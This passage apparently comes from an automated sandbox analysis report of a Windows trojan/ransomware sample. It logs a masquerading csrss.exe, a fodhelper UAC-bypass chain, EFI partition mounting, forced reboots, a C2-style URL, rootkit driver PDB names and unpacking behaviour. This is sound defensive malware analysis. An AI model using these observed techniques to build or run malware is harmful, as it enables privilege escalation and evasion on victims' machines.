            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /sJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelperJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelperJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
            Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Process WHERE Name = 'roughsnow.exe'
            Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrssJump to behavior
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@62/18@12/5
            Source: C:\Windows\System32\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: 4t4y4r89UZJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
            Source: C:\Windows\rss\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3212:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7108:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4004:120:WilError_01
            Source: 4t4y4r89UZ.exeString found in binary or memory: application/app/install.go
            Source: 4t4y4r89UZ.exeString found in binary or memory: application/app/install.go
            Source: 4t4y4r89UZ.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: 4t4y4r89UZ.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: csrss.exeString found in binary or memory: application/app/install.go
            Source: csrss.exeString found in binary or memory: application/resilience/btcblockchain/address.go
            Source: csrss.exeString found in binary or memory: for Decryptfailed to write an injector file %s: %wfirst install, ignore discover on starthttp: putIdleConn: keep alives disabledhttps://trumops.com/api/install-failureinvalid indexed representation index %dmismatched count during itab table copymissing argume
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\rss\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: 4t4y4r89UZ.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: 4t4y4r89UZ.exeStatic file information: File size 4520488 > 1048576
            Source: 4t4y4r89UZ.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x437a00
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 4t4y4r89UZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Loader.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: EfiGuardDxe.pdb7 source: csrss.exe, csrss.exe, 00000032.00000002.400160271.0000000005200000.00000040.00000001.sdmp
            Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: symsrv.pdb source: csrss.exe
            Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: Unable to locate the .pdb file in this location source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: The module signature does not match with .pdb signature. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: .pdb.dbg source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: '(EfiGuardDxe.pdbx source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: symsrv.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292634106.0000000000C55000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.300061428.00000000060D3000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.551813836.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.363596992.0000000000C55000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.392506023.0000000000C55000.00000040.00020000.sdmp
            Source: Binary string: or you do not have access permission to the .pdb location. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: EfiGuardDxe.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: dbghelp.pdb source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 4t4y4r89UZ.exe, 00000000.00000003.284369390.0000000005CCA000.00000004.00000001.sdmp, 4t4y4r89UZ.exe, 0000000A.00000003.299643807.0000000005C5A000.00000004.00000001.sdmp, csrss.exe, 0000000E.00000002.546482907.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.358316255.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000017.00000002.387694922.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 4t4y4r89UZ.exe, 00000000.00000002.292383315.0000000000A59000.00000040.00020000.sdmp, 4t4y4r89UZ.exe, 0000000A.00000002.325532501.0000000005629000.00000040.00000001.sdmp, csrss.exe, 0000000E.00000002.551604539.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000010.00000002.374881831.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000017.00000003.361405477.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000022.00000003.356330643.0000000006608000.00000004.00000001.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 14.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 23.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 34.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 42.2.csrss.exe.400000.1.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.0.unpack
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 0.2.4t4y4r89UZ.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Users\user\Desktop\4t4y4r89UZ.exeUnpacked PE file: 10.2.4t4y4r89UZ.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 14.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 23.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 34.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
